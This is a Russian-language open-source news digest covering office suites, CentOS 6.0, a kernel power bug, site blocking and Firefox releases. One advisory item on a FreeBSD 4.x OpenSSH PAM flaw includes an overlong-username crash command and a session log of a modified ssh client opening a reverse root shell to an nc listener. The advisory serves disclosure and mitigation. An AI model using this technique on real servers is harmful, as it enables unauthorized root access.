Ситуация со свободными офисными пакетами становится всё более интересной. Корпорация IBM, развивающая Lotus Symphony на базе OpenOffice.org, решила передать код этого проекта некоммерческой организации Apache Software Foundation (ASF).

Lotus Symphony — коммерческое офисное решение от IBM, основанное на разработках OpenOffice.org и распространяемое бесплатно (но без исходного кода, т.е. как freeware). При этом в IBM признаются, что никогда не были по-настоящему активными участниками Open Source-проекта OpenOffice.org, хотя и «присутствовали на различных собраниях, спонсировали конференции и работали совместно над стандартами». Код Lotus Symphony поддерживался своими силами и развивался как самостоятельный форк, который редко возвращал что-либо основному проекту.

Теперь ситуация изменится. Исходный код IBM Lotus Symphony будет передан на условиях лицензии Apache License 2.0 проекту OpenOffice.org, ныне управляемому организацией ASF. Кроме того, IBM обещает работать с участниками проекта над интеграцией некоторых созданных в корпорации наработок из Lotus Symphony в OpenOffice.org. В частности, у IBM есть опыт по замене лицензированных под GPL/LGPL зависимостей, что потребуется ASF для перевода всего проекта на Apache License. Речь идет и о функциональных вещах: IAccessible2, поддержка макросов VBA, улучшения в пользовательском интерфейсе.

Вместе с тем, IBM предложит ASF новый проект для «инкубации» — ODF Toolkit. Это набор Java-библиотек для приложений, работающих с офисными документами в формате OpenDocument.

Официальный анонс всех этих инициатив IBM состоится сегодня на мероприятии ODF Plugfest в Берлине (Германия). В жизнь они будут воплощаться в течение «пары следующих месяцев».

Тихо и незаметно вышел долгожданный CentOS 6.0

Как пишут сами разработчики

•   CentOS 6.0 represents many changes from previous releases.
•   CentOS 6.0 has been completely rebuilt using a newer build system and library checks to confirm upstream binary compatibility.
•   CentOS 6.0 при исталяции позволяет использовать все разделы(каналы) с пакетами, в том числе Optional

Баги и фичи:

Для установки системы минимально необходимо 392 Мб памяти, если в системе памяти меньше 652Мб, то автоматом используется текстовый режим установки. При этом установка в текстовом режиме имеет ограниченные возможности по настройке дисков и устанавливаемых пакетов.

1. Сообщение "Insufficient memory to configure kdump!" появляющееся во время установки. Извесный баг возникающий на системе имеющей менше 4 Гб оперативной памяти и решается обновлением kexec-tools-2_0_0-153_el6 или новее.
2. Версия дистрибутива для x86_64 разделена на 2 DVD, второй диск содержит пакеты из "Optional" раздела, который как правило ненужен при установке дистрибутива.
3. ISO образ дистрибутива для i386, слишком большой для записи на односторонний DVD+R и может быть записан на DVD-R.

На прошлой неделе в Бразилии прошел 12-й Международный форум по свободному программному обеспечению (Fórum Internacional do Software Livre, FISL). На нем было объявлено о том, что правительство Бразилии подписало «соглашение о намерениях», в рамках которого планируется его непосредственное участие в проектах свободных офисных пакетов.

Редакции nixp.ru стало известно об этом от Саймона Фиппса (Simon Phipps), экс-главы Sun Microsystems по Open Source. Сам он весьма воодушевлен этим событием, подчеркивая, что теперь «Бразилия начнет не только использовать офисные приложения, от которых она зависит, но и напрямую взаимодействовать с ними», а «рост базы разработчиков — это новости, которые нам всем так нужны».

Соглашение было подписано исполнительным комитетом по свободному программному обеспечению от имени правительства Бразилии с одной стороны, представителями организаций The Document Foundation (TDF) и Apache Software Foundation (ASF) — с другой.

Прямой интерес бразильских чиновников в развитии свободных офисных пакетов связан с их широким распространением в государственных структурах и подведомственных организациях. Заявляется, что эти пакеты используются на «более 1 миллиона общественных компьютеров, что представляет существенную экономию на лицензионных отчислениях за ПО и национальные инвестиции в технологии».

Вышел одиннадцатый номер журнала UserAndLINUX. Тема номера – Обмен мгновенными сообщениями: есть ли достойные приложения под Линукс?

В номере: • Обзоры IM-клиентов, приложений для общения по VoIP, VVoIP, FoIP, sip-, XMPP/Jabber-, ICQ- и twitter-клиентов; • Google платит русскому студенту за ошибки в Chrome; • Русский хакер вскрыл секретный протокол Skype; • ICQ отправилась покорять Linux; • Обзоры рынка мобильных устройств; • 10 интернет-рекордов; • Зеленые Андроиды наводнили метро!; • 10 наиболее распространенных паролей iPhone; • Рейтинг самых опасных ошибок при создании программ; • ООН против лишения права на Интернет; • 15-летний выходец из Украины продал программу крупной IT-компании; • Исследование показало, что в составе GNU/Linux всего 8 процентов GNU; • Первые хромбуки: кто уже выпускает?; • LexisNexis: наше решение с открытым кодом в 4 раза быстрее, чем Hadoop.

PDF - 56 страниц, 4.9Мб Печатный - 100 стр.

В используемом в Ubuntu 11.04 и Fedora 15 Linux-ядре 2.6.38, а также в 2.6.39 и тестовых версиях 3.0-rc наблюдается возрастание энергопотребления на 10-30%. Кроме Phoronix подобная тенденция наблюдалась в тестах издания Tom's Hardware.

По предварительным данным, одна из приводивших к повышению энергопотребления проблем связана с изменением в коде поддержки ASPM (Active-State Power Management) для плат PCI Express, который стал активироваться только при сигнализации о поддержке ASPM со стороны BIOS (определенные реализации BIOS указывают, что ASPM не поддерживается, но все равно инициализирует данную поддержку для некоторых устройств).

Экспериментальным путем был выявлен обходной путь решения проблемы, который позволяет уменьшить энергопотребление в среднем на 15%. Для решения проблемы систему следует загрузить передав ядру в интерфейсе загрузчика GRUB параметр "pcie_aspm=force".

В Debian для grub2 нужно следующее:

1. Исправить в файле /etc/default/grub строку

GRUB_CMDLINE_LINUX="pcie_aspm=force"

2. Запустить update-grub

Все операции естественно от рута

Тихо и незаметно в списке рассылки full-disclosure представлена критическая уязвимость в используемой во FreeBSD 4.x версии OpenSSH, позволяющая удаленному злоумышленнику без аутентификации получить root-доступ к системе. Уже создан и публично опубликован эксплоит, позволяющий получить привилегированный shell на подверженных уязвимости серверах.

Уязвимость проявляется для протоколов SSH1 и SSH2. Проблема вызвана ошибкой в реализации аутентификации с использованием PAM на платформе FreeBSD. Проблема присутствует в функции "pam_thread()" из файла auth2-pam-freebsd.c.  http://www.freebsd.org/cgi/cvsweb.cgi/src/crypto/openssh/Attic/auth2-pam-freebsd.c Начиная с версии FreeBSD 5.2 содержащий уязвимость файл auth2-pam-freebsd.c был заменен новой реализацией, т.е. с большой долей вероятности можно утверждать, что новые версии FreeBSD проблеме не подвержены. 100% уверенности пока нет, так как точно не ясно, не перекочевал ли проблемный код в какие-либо библиотеки PAM или сторонние реализации OpenSSH, используемые и поныне. Детальный аудит ещё предстоит провести.

Ошибка проявляется при передаче слишком длинного имени пользователя. Простой способ проверить наличие уязвимости - попытаться обратиться к своему серверу, указав логин порядка 100 символов. Например: "ssh -l`perl -e 'print "A" x 100'` хост", в случае проблемы, можно наблюдать крах рабочего процесса sshd и вывод в лог /var/log/messages сообщения "/kernel: pid N (sshd), uid 0: exited on signal 11 (core dumped)". Изучение core-дампа показало, что проблема подвержена эксплуатации, так как атакующий может контролировать указатель перехода и позиционировать его на shellcode. Прототип рабочего эксплоита был успешно создан путем небольшой модификации кода ssh-клиента из пакета OpenSSH 5.8p2.

$ ./ssh -1 192.168.1.1 $ nc -v -l -p 10000 listening on [any] 10000 ... 192.168.1.1: inverse host lookup failed: Unknown host connect to [192.168.1.2] from (UNKNOWN) [192.168.1.1] 1038 uname -a FreeBSD h4x.localdomain 4.11-RELEASE FreeBSD 4.11-RELEASE #0: Fri Jan 21 17:21:22 GMT 2005 /GENERIC i386

id

uid=0(root) gid=0(wheel) groups=0(wheel)

Поддержка ветки FreeBSD 4.x прекращена ещё в 2007 году, но данная версия все еще используется на некоторых серверах в сети. Пользователям версии FreeBSD 4.x рекомендуется срочно обновить OpenSSH до более новой версии. В качестве обходного пути решения проблемы следует разрешить через пакетный фильтр доступ по SSH только для доверительных хостов и отключить поддержку PAM, указав в настройках "ChallengeResponseAuthentication no". Информации о возможности поражения других операционных систем, использующих устаревшие версии OpenSSH с реализацией поддержки PAM от проекта FreeBSD, пока нет.

Тянуто c Opennet.ru

Семь сайтов были заблокированы сроком на месяц (с начала мая до начала июня) по заявлению «Централ партнершип» (ЦПШ), рассказала «Ведомостям» пресс-секретарь управления «К» (БСТМ МВД России) Лариса Жукова.

...

Подчиняться полицейским готовы не все. Блокировали доступ к пиратским сайтам только ООО «Ай-пи-ти-пи» (IPTP Networks), ЗАО «РетнНет» (RETN), ООО «Рускомнет», хотя предписание было направлено и другим магистральным провайдерам — ОАО «Комкор», ЗАО «Компания «Транстелеком» (ТТК), ОАО «Вымпелком», ОАО «МТС», ОАО «Ростелеком» и ЗАО «Раском», рассказала Жукова. По ее словам, управление «К» собирается жаловаться в Роскомнадзор на отказавшихся сотрудничать провайдеров МТС, «Раском», «Комкор» и ТТК, а также на «Вымпелком» и «Ростелеком», не ответивших полиции.

...

Учебник «Learning Go» подойдет для тех, кому мало официального Go Tutorial, но при этом лень читать спецификацию языка.

Книга свёрстана на LaTeX и распространяется под CC BY-NC-SA 3.0. Автор (Miek Gieben) периодически дополняет и редактирует книгу.

Отсюда можно выкачать последние редакции указанного учебника в PDF:

 http://www.miek.nl/files/go/

В небольшой заметке описывается, как подключать под юникс этот небольшой источник бесперебойного питания

Интерес корпоративных пользователей к Firefox стал снижаться после перехода проекта Mozilla на 16-недельный цикл подготовки релизов, в соответствии с которым новые значительные релизы будут выпускаться каждые 6 недель, заменяя собой прошлые выпуски, поддержка которых сразу прекращается. Несмотря на то, что обычные пользователи с радостью восприняли более оперативную реализацию новшеств, для корпораций новшества находятся на втором плане, главное для них обеспечение длительной поддержки стабильных версий.

\cut{Читать далее}

Например, многие корпорации до сих пор используют Firefox 3.6 и только планируют переход на Firefox 4. При обновлении браузера до новой значительной версии недостаточно просто установить сотрудникам обновление, необходимо провести обучение персонала, обновить документацию, убедиться в работоспособности всех используемых дополнений, досконально протестировать работу всех корпоративных ресурсов, устранить все проблемные моменты и только после этого начать внедрение. При выходе новой значительной версии каждые полтора месяца с прекращением поддержки прошлого выпуска смысл использования Firefox корпорациями теряется, процесс поддержки становится излишне обременительным (например, в больших корпорациях только согласование перехода на новую версию может занять месяцы).

В настоящее время корпорации оказались перед непростым выбором: перейти на Firefox 4 и закрыть глаза на исправление уязвимостей, смириться с возможными проблемами в работе внутренних web-приложений или оставаться на ветке Firefox 3.6.x. Ни один из этих вариантов не является приемлемым. Компании не готовы пойти на риск столкнуться с ситуацией, когда критичное для бизнес-процесса дополнение перестанет работать в новой версии, а старая версия уже не будет поддерживаться производителем, или смириться с возможным наличием неисправленных, но известных злоумышленникам, уязвимостей.

Несмотря на недовольство корпораций организация Mozilla не намерена отступать от более динамичного цикла развития в угоду особенностей корпоративной политики. Firefox ориентируется на конечных пользователей, желающих быть на пике инноваций в Web. В настоящее время Web-технологии развиваются слишком интенсивно и Mozilla нацелена на обеспечение максимального удобства для пользователей и поддержку новых веяний в Web. По мнению Mozilla, оптимальным вариантом как для пользователей так и для Web является выпуск небольших, но частых релизов, сочетающих устранение проблем безопасности, исправление ошибок и реализацию небольшой порции новшеств. Отныне, одна ветка Firefox будет заменять другую: версия Firefox 5 рассматривается как обновление к Firefox 4, а Firefox 6 заменит собой Firefox 5, без каких-либо промежуточных корректирующих релизов. Отдельных обновлений для ветки Firefox 4.x больше выпущено не будет.